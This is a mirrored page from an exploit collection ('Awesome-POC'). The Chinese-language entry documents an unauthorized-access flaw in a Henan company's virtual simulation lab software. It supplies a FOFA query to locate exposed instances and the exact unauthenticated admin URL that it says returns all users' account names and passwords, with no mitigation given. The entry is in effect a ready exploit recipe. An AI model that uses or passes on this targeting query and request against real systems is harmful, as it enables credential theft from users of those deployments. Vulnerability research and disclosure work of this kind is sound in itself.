admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-08 20:36:14 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/Web应用漏洞/阿尔法科技 虚拟仿真实验室 未授权访问漏洞.md

35 lines
580 B
Markdown
Raw Normal View History

Web应用漏洞
2022-05-17 17:43:20 +08:00
# 阿尔法科技 虚拟仿真实验室 未授权访问漏洞
## 漏洞描述
阿尔法科技 虚拟仿真实验室 存在未授权访问漏洞通过访问构造的Url可以获取敏感信息
## 漏洞影响
```
虚拟仿真实验室
```
## FOFA
```
body="河南阿尔法科技有限公司"
```
## 漏洞复现
未授权的Url为
```plain
/admin/student/studentlist.html?page=1
```
![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202101929331.png)
成功获取所有用户的账号密码信息
## 参考文章
http://www.0dayhack.net/index.php/1702/
Reference in New Issue Copy Permalink